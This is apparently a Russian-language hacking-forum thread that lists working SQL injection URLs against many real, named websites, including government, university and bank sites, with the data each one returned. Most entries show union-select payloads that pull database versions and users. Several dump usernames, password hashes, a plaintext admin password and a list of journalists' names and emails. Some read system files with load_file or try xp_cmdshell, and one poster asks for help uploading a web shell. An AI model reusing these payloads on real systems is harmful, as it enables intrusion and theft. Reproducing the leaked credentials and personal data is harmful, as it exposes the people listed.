http://www.summervillehomes.org/communities.php?id=-8+union+select+1,version(),user()--
4.1.22-standard-log, summervi_svh@localhost

http://vritikaherbotech.com/basket.php?id=-2+union+select+1,version(),3,4,5,6,7,8,9,10--
5.0.77-community

http://vritikaherbotech.com/basket.php?id=-2+union+select+1,group_concat(concat(table_name,0x 2f2f2f,table_schema)+separator+0x0a),3,4,5,6,7,8,9 ,10+from+information_schema.columns--

http://www.shooflypublishing.co.uk/product.php?id=-13+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22--
shoofly_@localhost:4.1.22-standard:shoofly_shoofly

http://www.altereglow.co.uk/docs.php?doc_id=-19+union+select+1,concat_ws(0x3a,user(),version(), database()),3--
web78-a-cubec-57@localhost:5.0.82-community:web78-a-cubec-57

http://www.onthetable.co.uk/product.php?product=Freud_Tea_Pot&sproductID=11+limit+0+union+select+1,2,3,concat_ws (0x3a,user(),version(),database()),5,6,7,8--
mysql50847@10.41.0.5:5.0.45:db50847

http://www.smartmeter.co.uk/product.php?prod_id=-5+union+select+1,2,3,4,5,6,7--
web17_smartbase@localhost:5.0.82-community:web17_smartbase

http://www.phillipsandevans.co.uk/product.php?product=-2858+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
web33-pae@localhost:5.0.82-community:web33-pae

http://www.epscor.dbi.udel.edu/outreach/science/article.php?id=-1+union+select+concat_ws(0x3a,user(),version()),2, 3--

PR: 5

user: epscor-dev@localhost
version: 5.0.60

---

http://www.mmenterprises.co.in/news.php?nid=4+and+substring(version(),1,1)=5
http://www.aurensa.es/news.php?lang=ENG&year=-2007+union+select+1,2,3,4,5,6,7,8--
5.0.51a-3ubuntu5.4
http://www.anforaformacion.es/news/php/v_oldboletin.php?codigo=-16+union+select+version(),2,3,4--
5.0.32-Debian_7etch10-log
http://www.coecidriga.lv/news.php?lang=lv&cid=9&tid=-79+union+select+1,2,3,4,5,6,unhex(hex(version())), 8,9,10,11,12--
4.1.15-Debian_1ubuntu5-log

Торгово-промышленная палата Российской Федерации.
http://www.ruschamber.net/banners/click.php?banner=316013+OR+1=(select+@@version)
Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86) Mar 3 2007 18:40:02 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.atlantix.ie/payroll.php?id=-1+union+select+1,concat(username,0x2f2f2f2f,passwo rd),3,4+from+administration--&language=russian
atlantix////KARMI123

http://www.youthsports.gov.mv/view_main_story.php?recordID=1+union+select+1,2,ae s_decrypt(aes_encrypt(concat(0x2,version(),user(), database()),0x71),0x71),4,5,6/*

4.1.7youthsp@10.16.6.2youthsp


http://www.hb-show.de/index.php?page_id=63+union+select+concat_ws(0x3,ve rsion(),user(),database())


4.1.22 10002_sismedia@localhost 10002_sismedia

http://gitarre.ru/index.php?mode=pages&id=-36+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5,6,7,8--

u57821@10.10.10.206:u57821_gitarre:5.0.67-log

http://www.kharkiv.com/index.php?s=1&bt=1&db=1&cl=1&cat_id=65%20and%201=2%20union%20select%201,version (),3,4,5+--+&page=1
4.0.27

http://propel.ru/forum/see.php?id=1041+union+select+1,2,concat(0x2,versio n(),user(),database()),4,5,6,7,8,9,10,11+limit+1,1

5.0.26-logpropeltu_propel@localhostpropeltu_propel

http://www.rosexport.biz/catalog.php?ID=-1'+union+select+1,2,aes_decrypt(aes_encrypt(versio n(),0x71),0x71),4,5,6,7,8+--+
4.1.11-Debian_4sarge5-log

http://www.touch-deco.fr/fiche-produit.php?id=65+union+select+1,concat_ws(0x2,ver sion(),user(),database()),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22

5.0.48 touch@localhost touch

http://www.blumenbar.de/buch.php?id=-3+union+select+1,concat(version(),0x2f2f2f,user(), 0x2f2f2f,database()),group_concat(table_name+separ ator+0x0a),4,5,6,7+from+information_schema.tables+--+

http://www.ifestival.fr/article.php?id=337+union+select+1,2,3,4,concat_ws( 0x2a,version(),user(),database()),6,7,8,9,10,11,12 ,13,14,15,16,17,18


5.0.22 jbfontana @localhost frequencb

http://www.wheelingwv.gov/forbusinesses.php?fid=-1+union+all+select+1,concat(database(),0x3a,user() ,0x3a,version()),3,4,5,6
database: cityofwheeling
user: cowwv@localhost
version: 4.1.22

http://www.sandiego.edu/EPIC/news/frontnews.php?id=null+union+select+1,version(),3,4 ,5,6--


Антибоян не работает, не пинайте если что:(

jokester: гугл зато работает

http://www.stengazeta.net/author.html?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(concat(id,'ll',fname,'ll',name,'ll',email,'ll ',homepage)+separator+0x0a),14+from+persons/*
1llАнабарllСергейllaanabar@gmail.comll
2llЮзефовичllГалинаllyouzef@mail.rul l
3llГодерllДинаlldinagoder@mail.rull
4llСоринllАлександрllll
5llРубинштейнllЛевllll
6llАлексееваllНатальяllll
7llАфанасьевllАлексейllll
8llБермантllЕкатеринаllll
9llБлантllМаксимllll
10llБыковскийllЕгорllmy@information.r ull
11llГессенllМашаllmasha@gessen.rull
12llГладильщиковllЮрийllll
13llГоловинскаяllИринаlligaro@yand ex.rull
14llГринбергllМаркllll
15llЖуковllБорисllbbzhukov@mtu-net.rull
16llЗмеулllАлександрllll
17llИгумноваllЕленаllll
18llКорецкийllВасилийllkinotimeout@ mail.rull
19llКрученицкаяllНадеждаllll
22llЛивергантllАлександраlllios ta@yandex.rull
23llЛебедеваllЮлияllll
24llПановllАлександрllll
25llСедовllЯрославllll
27llСолодовникllСветланаllsolodo vnik1@yandex.ru.ll
28llСтефановичllНатальяllll
29llСафроноваllТатьянаllll
30llСоколовllНикитаllnikitaso@yandex. rull
31llУховllДмитрийllll
32llРубинштейнllМарияllmanechka@mai l.rull
33llУвароваllМарияllll
35llЩербаковllАлександрllll
36llЯринllАлександрllll
37llДубинllБорисllll
38llЛупо

http://www.lncygt.gov.cn/list.php?cid=1+union+select+1,2,3,concat_ws(0x3a,v ersion(),user(),database()),5,6,7,8,9+limit+1,1

4.0.21-standard-log:root@123.188.254.130:t101

http://www.dpe.edu.mv/dpe/news/view.php?news_id=0%20union%20all%20select%201,2,un hex%28hex%28@@version%29%29,4,5,6,7--

http://www.calendar.ilstu.edu/detail.taf?_function=detail&EventCategories_uid1=41&event_uid2=-1)+UNION+ALL+SELECT+1,2,3,SYSTEM_USER,@@version,6, 7,8,9,10, @@SERVERNAME,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,use r,41,user,43,user,45,user,46,47,48,49,50,51----

http://www.orienttouch.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers--

http://www.miss-internet.cz/content.php?pid=4&id=-72%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,1 1,concat_ws(0x3A3A,%20version(),database(),user()) ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30/*

http://www.sdp-usk.ba/news.php?id=-1+union+all+select+1,concat(user_level,0x3a,userna me,0x3a,user_password,0x3a,user_email),null,null,5 ,null,7,8+from+phpbb_users--
version: 5.0.22-Debian_0ubuntu6.06.3-log
database: sdp-usk-ba
user: user0610@localhost

http://bangkhunthianjoggingclub.com/webboard_ans.php?id=1%20UNION%20SELECT%201,2,conca t_ws(0x3a,version(),database(),user()),4,5,6,7,8,9/*
Database Version: 4.1.21-standard
Database name: bangkhunt_fl
User name: bangkhunt_fl@localhost

Time Banking UK
http://www.timebanks.co.uk/cgi-bin/display.pl?itemid=(select+@@version)
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.briancable.com/view.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13,14,15,16,17,18-

assa.edu.au
http://www.assa.edu.au/programs/policy/paper.php?id=-1+UNION+ALL+SELECT+1,2,concat(email,0x3a,password) ,4,5,6,7,8,9,10+FROM+people

http://www.niburu.nl/viewinstelling.php?id=-14+union+all+select+1,2,3,concat(user,0x3a,passwor d),5,6,7,8,9+FROM+mysql.user--
Load_file:
http://www.niburu.nl/viewinstelling.php?id=-14+union+all+select+1,2,3,load_file(0x2f6574632f70 6173737764),5,6,7,8,9--

http://www.china-deaf.cn/vwd.php?id=1+union+select+1,2,concat_ws(0x2a,versi on(),user(),database()),4,5,6,7,8+limit+1,1

4.0.27-log ztqlongxiao@localhost ztq_longxiao

http://www.tacheproduction.org/site/pages/expos.php?sup=-5+union+select+1,concat_ws(0x3a,id,login,pass),3,4 ,5+from+user/*

http://tonitomov.com/products.php?id=-20+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6,7,8,9,10,11,12,13,14,15--
tonitomo_sapove:5.0.81-community-log:tonitomo_tonitom@localhost

http://paintdecordiy.com/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7--
d60204512:5.0.77-log:u70215489@cgihost

Вторая скуль на yahoo и ещё не последняя. имхо))

Так как мою тему снесли, выложу сюда:

PR: 5

http://suggestions.yahoo.com/detail/?prop=realestate&fid=158954+and+1=0+union+select+0,0,0,unhex(hex(co ncat_ws(0x3a,version(),database()))),0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0--


Version: 4.1.23-Yahoo-SMP-log
Database: userfeedback

http://www.nbtb.gov.cn/homepage/view.php?id=3053&catid=2+union+select+1,2,concat(0x2,version(),user (),database())+limit+1,1

4.1.21-standardnbtb@localhostnbtb

http://www.scaa.us/article.php?id=-4%20union%20select%201,2,3,4,5,concat_ws(0x3a3a3a, username,password)%20from%20users

http://www.bigone.ru/so/so.php?sub=-1+union+select+1,concat_ws(0x3a,login,password),3, concat_ws(char(58),version(),database(),user()),5, 6,7,8,9+from+bigone_users--
admin:***
5.0.51a-24+lenny1-log:z53907_acad:z53907_acad@77.221.130.10

http://www.tbrandable.com/buy.php?id=45+UNION+SELECT+1,AES_DECRYPT(AES_ENCRY PT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2 F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696 E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17+LIMIT+1,1--
Database Version: 5.0.83-community
Database name: tbrandab_affiliate
User name: tbrandab_start10@mail.supremecenter204.com

http://www.mmsah.cn/yh/yhq.php?id=1099+union+select+concat_ws(0x3,version (),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16

5.0.51a-community-nt root@localhost discuz


http://www.officialrentreview.com/property.php?id=4+union+select+concat_ws(0x2,versi on(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18

5.0.81-log dbo241449076@74.208.16.115 db241449076

http://77.220.178.134/db.php?action=npcs&npcid=-1+union+select+1,group_concat(column_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46,47,48,49+from+information_schema .columns+where+table_namex6163636573735f616363--

http://www.psiuwesleyan.com/news.php?ID=-47'+union+select+1,2,version(),4,5,6,7/*

Database Version: 4.1.22
Database name: psiu
User name: xiofpsiu@localhost

http://bipek.kz/?pid=blog&last=&obid=-127%20union%20select%201,2,3,group_concat(concat_w s(0x3a3a,login,pass,user_name,email)%20separator%2 00x0a),5,6,7,8,9,10%20FROM%20users_table+--+
Dm::f882b462f27b4706efed0c276ff1ad88::::dm@itelk.c om Борман::a02ce8dec8f8ad2ba4b2dce8160043c2::Б армалей::Borman_barmaley@mail.ru малой::06a9277e0d77bf374281cc927d432fe2:::: Roza::202cb962ac59075b964b07152d234b70:::: vacman::968520b83979f83f0d5445f00918247f:::: Bereza::7f1de29e6da19d22b51c68001e7e0e54::Роза ::baygazanova@uk.bipek.com alibi::ba954023e9ee590ab082b65b81b6b93d::alibi::li bi7@rambler.ru alexa::a3aa53f78cacac47a7ecfcd6f935964c:::: banderos::88f1798e205c841fe851b42095329f84::bander os::jazylbekov@mail.ru asm::caf1a3dfb505ffed0d024130f58c5cfa::Алекс� �ндр Мозговой::asm@bipek.kz Axel::698d51a19d8a121ce581499d7b701668::Axel Rudy::kazjakov@uk.bipek.com Alex11::51036dc8b2017759c25be89e8e5f1abc::Алек сей::a.fanakov@mail.ru Meirzhan::ffe956e3950311a0e63476459fb40285::Мей ржан::meirzhan@mail.ru Mixt::1f34004ebcb05f9acda6016d5cc52d5e::Серге й::Mixt@mail.kz vlad::d3fad7d3634dbfb61018813546edbccb::влад:: leondj::0b9c5120ea86155f02d81e6f2f90c900::Leonid:: Leondj@mail.kz scorpion::9590d4b8da25194490efc3978b494e48::Мак сим:

http://www.cnmo.com/mainpage_into_bbs.php?action=sel_pro&manuid=1+union+select+1,concat_ws(0x3,version(),us er(),database())/*

version:5.0.45-log
user:root@192.168.50.21
database:cnmo_zoldb

The world's local bank.
MS Access
http://www.hbeu1.hsbc.com/ukservices/branchlocator/area.asp?area=a'+union+select+1,2,3+from+sp_areade tails+where+'1'='1&flag=true
Может кто сможет раскрутить. Доступа к системным таблицам как всегда нету.Если подобрать таблицу то потом думаю только подзапросами...

toyslandpark.com

blind-sql

http://toyslandpark.com/foto/indice.php?aid=6'

http://toyslandpark.com/foto/indice.php?aid=6+and+1=if(ascii(substring((select+ concat_ws(0x3,user(),version(),database())),1,1))= 83,1,0)+--+

user: Sql_tlp@localhost
version: 4.1.11-Debian_4sarge7-log (раритет 0_o)
database: toysland

http://www.mining.kz/index.shtml?f=show&type=1&id=-14979976727+union+select+1,2,concat_ws%280x3,versi on%28%29,user%28%29,database%28%29%29,4,5,6,7+--+

version: 5.0.77-community
user: miningk_miningka@localhost
database: miningk_mining

http://www.taylordecordoba.com/artistgallery.php?id=-2+union+select+1,group_concat(username,0x3a,passwo rd)+from+user--

Database Version: 5.0.67-community
Database name: taylo3_taylordc
User name: taylo3_sauron@localhost

http://bkl.eoc.suny.edu/custom_content.php?id=-3+union+select+1,2,version(),4,5+from+mysql.user/*

Database Version: 5.0.41-community-nt
Database name: bklyn_web_user
User name: BKLYN_web_user@localhost

http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+unhex%28hex%28concat_ws%280x3a,user %28%29,version%28%29,database%28%29%29%29%29--

Database Version: 4.1.10a - WideXS
Database name: gsmtrack
User name: root@localhost
PR 4
file_priv : Y

http://quebec-canada.com.ua/show.php?tab=other&id=9999+union+select+1,2,group_concat(column_name+ separator+0x0a)+from+information_schema.columns+wh ere+table_name=0x636f7374+--+
id rank country persent

http://quebec-canada.com.ua/show.php?tab=other&id=9999+union+select+1,2,table_schema+from+informa tion_schema.tables+where+table_name=0x636f7374+--+
teresh_canada

http://quebec-canada.com.ua/show.php?tab=other&id=9999+union+select+1,2,group_concat(concat_ws(0x 3a3a3a,id,rank,country,persent)+separator+0x0a)+fr om+teresh_canada.cost+--+

1:::1:::Токио (Япония) :::130.7 2:::2:::Лондон (Великобритания):::119 3:::3:::Москва (Россия):::117.4 4:::4:::Осака (Япония):::116.1 5:::5:::Гонк-Конг:::109.5 6:::9:::Цюрих (Швейцария):::101.6 7:::17:::Париж (Франция):::94.8 8:::21:::Рим (Италия):::90.5 9:::27:::Лос-Анджелес:::86.6 10:::43:::Мюнхен (Германия):::84 11:::49:::Прага (Чехия):::83.3 12:::84:::Мехико (Мексика):::73.3 13:::89:::Торонто (Канада):::71.8 14:::113:::Монреаль (Канада):::66.4 15:::116:::Дели (Индия):::64.7

http://www.soldatru.ru/news/show_news.php?id=-281+union+select+1,2,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,4,5,6+--+

user: u34985@10.10.223.73
version: 5.0.67-log
database: u34985


http://www.ertegi.ru/index.php?id=2+union+select+1,2,concat_ws%280x3a,u ser%28%29,version%28%29,database%28%29%29+--+

user: ertegir_francua@localhost
version: 5.0.84-log
database: ertegir_ertegi





Хех)) Сайт нефти)))

http://tdkmg.izhanov.ru/faq/?id=-15+union+select+1,2,3,4,5,6+--+

http://www.cide.edu/facultad_division.php?d=1+union+select+1,concat_ws (0x2,version(),user(),database()),3,4,5+limit+1,1

5.0.32-debian_7etch10-log root@localhost webcide

http://www.duikteam-poseidon.nl/agenda_detail.php?id=-1+union+select+1,1,1,unhex(hex(concat_ws(0x3a,user (),version(),database()))),3,4,5--
root@localhost:5.0.19-nt:poseidon
PR 2
file_priv : Y

http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,4,5,group_ concat(concat_ws(0x3a3a3a,name,password)+separator +0x0a),7+from+user
Grünig:::a1c7e629be72a6091ecd1f9c37cdc369 Grünig:::348395d346e03ba2c56db7827d319b66 Fiorucci:::9a871a2a1b44ce36da856605dd3c446c Tillmann:::ab85a6f19d0180b0eed0d304594662c5 Nydegger:::b97748566824f7250f172972b2acc696 Klaus:::f270bfe89d0e0ae9a93af1daacf8a951 schweizer:::a79f8ff43b7bc32d6229e8ec2eb94a16 Zbinden:::e39e55de0291db48de53420da533db5b Pollak:::a1c88562e5670752b91227226f9b3ab4 de manuel:::be788819059b62edd8572be65a5e4bf5 Liechti:::775d9d3d815746460ca59a4c966ac538 Pollak:::233224c1e07a79f6e88e53ce09891f16 winzeler:::6bb1d01318442953179416e1f50de743 Kropf:::dd4b9f37d5d7525a83ad5906299d8ba6 Berger:::79ee34a2c60be9b7fd6bcee962e36d0b Dubuis:::a771378824a5c1c2b3d56be30012bbe7 Cueni:::5703672c4bb030a55988a42c705c3097 Kunde:::6a7dc7ef47e0d299b4b75b5b4dff3996 Dillier Gilomen:::7c9e5a874d69573ff41258231b38e3f0 :::dd82988070e6ee4f7a72deef16003877 :::2d047ace7b1647328cd3d93a960a9cc5 :::c6a64e300eae52f8fe3e2e0ad1548138 Dömötör:::cc27dae70b0bab3591ee6cdf0cc5f4a4 Grünig:::57130ee39c8a283237d5107ec14cce4d

http://www.dancor.sumy.ua/portal_ads.php?id=-274572+union+select+1,2,3,4,5,6,7,8,9,%28concat_ws %280x3a,user%28%29,version%28%29,database%28%29%29 %29+--+

user: dancor@localhost
version: 5.1.35-log
database: dancor

http://www.chashka.ru/news.php?id=-28+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5--

u8358@10.10.10.205:5.0.67-log:u8358



http://bjola.com/main.php?id=-28+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database()),6--

u_bjola@localhost:4.1.22-log:bjola



http://www.2kamnya.ru/info.php3?id=-28+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5,6,7,8,9,10,11,12,13,14,15--

u26377@10.10.10.216:5.0.67-log:u26377_2




на десерт.

http://www.globaltrance.nl/dj_booking.php?id=-28+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

root@localhost:4.0.16-nt-log:globalbass


http://www.globaltrance.nl/dj_booking.php?id=-28+union+select+1,concat_ws(0x3a,user,file_priv),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.us er--

root:Y

http://www.globaltrance.nl/dj_booking.php?id=-28+union+select+1,load_file(0x633a2f626f6f742e696e 69),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mys ql.user--

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

C:\Inetpub\globalbass.nl\

http://ftk.cc.uz/forum.phtml?action=viewMessageInForum&id=-4+union+select+1,2,3,4,concat_ws(user(),version(), database())--

5.0.32-Debian_7etch10-logftm-root@localhostftm-smnp
http://ftk.cc.uz/forum.phtml?action=viewMessageInForum&id=-4+union+select+1,2,3,4,table_name+from+information _schema.tables--

PostgreSQL

http://vg.kusel.de/content/og_news/og_news_ansicht.php?newsid=1;select+cast(version() +as+int)


PostgreSQL 8.1.17 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

http://www.mollinkdesigns.com/buy.php?id=21+UNION+SELECT+1,AES_DECRYPT(AES_ENCRY PT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2 F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696 E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10+LIMIT+1,1--
Database Version: 5.0.32-Debian_7etch10
Database name: mollin_db1
User name: mollin_1@www13b.your-server.co.za
http://mycartoon.ir/buy.php?id=21+UNION+SELECT+1,CONCAT(0x7873716C696E 6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2 A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9 ,10,11+LIMIT+1,1--
Database Version: 5.0.67-community
Database name: cddooni_cartoon
User name: cddooni_user@localhost

http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,concat_ws(0x3a,ID,UserName,Us erPass,UserMail),5,6,7+from+users/*

http://www.divascarlet.it/news.php?id=-9+union+select+1,2,3,4,5,concat_ws(0x3a,username,p assword),7,8,9+from+users--

http://www.pentagonusa.com/articles/article_detail.php?ArticleID=-1337+union+select+1,2,CONCAT_WS(CHAR(32,58,32),Use rGroupID,UserID,FirstName,LastName,UserName,Passwo rd,Email,AccessLevelID,Active),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+FROM+Users--

http://www.markettree.co.za/fact_desc.html?fact_det:acode=1+union+select+1,2,3 ,4,concat(0x3,version(),user(),database()),6,7,8,9 ,10,11,12+limit+1,1

5.0.68-logkds01_dev2@196.220.42.80kds01_dev2

Общая врачебная практика Свердловской области
http://www.ovpso.ru/index.php?page=news&id=100000000+union+select+1,concat_ws(0x3a,databas e(),user(),version()),3,4&top=1
ovpsoru: ovpsoru@berns.mplik.ru:5.0.41-log

ММВБ-Поволжье.Региональный биржевой центр.
http://www.micex-pfo.ru/?div=news&&id=11111+union+select+1,2,concat_ws(0x3a,database( ),user(),version()),4,5,6,7,8,9
micexpfo_new:micexpfo_new@localhost:5.0.24a

http://www.romver.ru/services/translit.php?razdel=3+union+select+1,2,3,4,5,6,tab le_name,8,9,10,concat_ws(0x3a,version(),database() ,user()),12,13+FROM+INFORMATION_SCHEMA.tables+limi t+1,30%20--

5.0.75-log:caramel:caramel@10.210.10.11

http://stihoslov.ru/view.php?id=-39657+union+select+1,2,3,user_loginname,user_passw ord,6,7,8,9,10,11,12%20FROM%20e107_user%20LIMIT%20 1,1+--+



http://www.gaztrubplast.ru/news/news1.php?id=-1+union+select+1,2,user%28%29,database%28%29,5,6,v ersion%28%29+--+


version: 4.0.27
database: gaztrub
user: gaztrub@zvm16

integrand.nl PR=8!!!!
http://www.integrand.nl/vestigingen-links.php?id=1/**/anD/**/1=-1/**/uniON/**/aLl/**/seLeCT/**/1,version(),3,4,5,6,user(),8,9,null+--+/*
version - 5.0.51a-community-nt
user - integrand.nl@localhost
database - integrand
Tables
forumusers
cms_users (username, password, email)

http://www.hotellepriori.com/index.php?productId=1+union+select+concat(0x3,vers ion(),user(),database())+limit+1,1

5.0.51a-3ubuntu5.4weblogik@localhostsite_lepriori

(вывод в исходнике)

http://www.dontpaniconline.com/designthepack/theme/?t=1+union+select+concat(0x3,version(),user(),data base()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29+limit+1,1/*

5.0.45db12781@localhostdb12781_designaposter

http://www.sarkrolik.ru/biblioteka.php?mode=bib&id=-30+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9--

4.1.22-log:rabbits@localhost:rabbits

ТИЦ: 10
PR: 3



http://www.paragrafen.no/?id=-30+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26--

4.1.22-log:paragrafen@uw01-php4.sysedata.no:paragrafen

PR: 5

[PR=5]

http://artecapital.net/rockgallery/index.php?id=-8+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6--


artecap_artecapital:5.0.81-community:artecap_arteadmi@localhost

[PR=3]
Странный сайт...

http://www.punk4dummies.com/interviews.php?id=-20+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8--


db213786537:5.0.45-log:dbo213786537@212.227.114.173

http://www.hjzf.gov.cn/admin/attachment.php?attachmentid=1+union+select+1,2,con cat(0x3,version(),database(),user()),4,5,6/*

4.0.27-logsite_hjgovsite_hjgov@localhost

_ttp://www.2bike.ru/moto.php?id=-7+union+select+1,group_concat(table_name),3+from+I NFORMATION_SCHEMA.TABLES+where+table_schema+not+in +('information_schema')--
obzor,obzor1

PR 6
http://home.uprm.edu/hrjobs/showjob.php?id=-330'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,24/*

Database Version: 4.1.12-log
Database name: hrjobs
User name: rea@home3.uprm.edu

---------------------------------------------------------------------------------------------------------------

PR 5
http://ing.uprm.edu/events2.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,10/*

Database Version: 4.1.12-log
Database name: pagina_decanato
User name: decainge@admin.uprm.edu

------------------------------------------------------------------------------------------------------------------------

PR 5
http://oiip.uprm.edu/building.php?id=-132'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,31/*

Database Version: 4.1.12-log
Database name: reabuilding
User name: oiip@admin.uprm.edu

Топ серверов lineage.
http://l2.kiktours.com

Зарегестрированые пользыватели:
http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a,name,pas s),mail+from+l2portal.users--

Зарегестрированые сервера:
http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a3a3a3a3a, user,web),server_type+from+l2portal.servers--

Вся БД: (Там БД от нескольких сайтов...)
http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a,TABLE_SC HEMA,TABLE_NAME),2+from+INFORMATION_SCHEMA.COLUMNS--

Если у когото получится залить шелл, плиз ПМ.

http://www.t-fisi.de/links.php?id=1+anD+1=-1+union+select+1,0,version()
Version = 5.0.51a-24+lenny1
User = web1@localhost
Database = usr_web1_1

Columns: Table bb1_users
username
password
email
userposts
groupid
rankid
title
regdate
lastvisit
lastactivity
usertext
signature
icq
aim
yim
msn
homepage
birthday
avatarid
gender
showemail
admincanemail
usercanemail
invisible
usecookies
styleid
activation
blocked
daysprune
timezoneoffset
startweek
dateformat
timeformat
emailnotify
buddylist
ignorelist
receivepm
emailonpm
pmpopup
umaxposts
showsignatures
showavatars
showimages
nosessionhash
ratingcount
ratingpoints
threadview
Columns: Table wp_users
user_login
user_pass
user_nicename
user_email
user_url
user_registered
user_activation_key
user_status
display_name

http://www.emiclassics.com/artistextras.php?aid=1+union+select+concat(0x2a,ve rsion(),user(),database()),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26+limit+ 1,1/*

4.1.22-logemiclassics2@vlonj201w2.emihosting.comemiclassi cs2

http://www.aamds.org/aplastic/news/news.php?id=9+and+1=0+union+select+1,concat_ws(0x3 a,user(),version()),3,4,5,6--

PR: 6

User: aamdsor_xweb@localhost
Version: 4.1.22-standard

http://www.scut-usa.org/news.php?id=9+and+1=0+union+select+1,2,3,concat_ws (0x3a,user(),version()),5--

PR: 3

User: news@localhost
Version: 4.1.22

Компания "Комплекс-С"
http://www.complexs.ru/index.php?page=about&pid=101+union+select+1,concat_ws(0x3a,database(),u ser(),version())/*
complexs:root@localhost:5.0.27-community-nt-log

Emergency Management Institute
http://training.fema.gov/IS/isfaqdetails.asp?id=2';Use+master+exec+xp_cmdhshel l+'ping 127.0.0.1'--&cat=General%20Questions
Запрос какой-то мудошный,при любой подстановке ошибка синтаксиса. Но через xp_cmdshell итд должно работать,проверьте кому интересно...:)

http://asrabruzzo.it
http://www.asrabruzzo.it/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/seLecT/**/1,version(),3,4/*
version - 4.1.20
user - dbuser@localhost
database - asrabruzzo

http://www.asrabruzzo.it/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/seLecT/**/1,coNcaT(0x3a,email,0x3a,name,0x3a,pass,0x3a,uname ,0x3a,user_icq),3,4/**/FROM/**/xoops_users/*

admin
http://www.asrabruzzo.it/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/seLecT/**/1,concAt(id,0x3a,username,0x3a,password),3,4/**/FROM/**/accounts/*

http://www.reha.cn/in_y1.php?id=1
+union+select+concat(0x3a,version(),user(),databas e()),3

5.0.51a-24root@localhostreha

klinik-agropolitan.com - PR=3
http://klinik-agropolitan.com/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/aLl/**/seLEcT/**/1,password,version(),username,user(),database()/**/FROM/**/users
version - 5.0.81-community-log
user - klinikag_admin@localhost
database - klinikag_sozo
table - users (username. password)

_ttp://www.greyhorse.ru/in/articles/article.php?id=-137+union+select+1,2,3,4,concat_ws(0x3a,uid,uname, pass,email,user_icq),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20+from+iw_users+limit+1+offset+2--


3:moder:f1c1592588411002af340cbaedd6fc33:toha@grey horse.ru:288826876

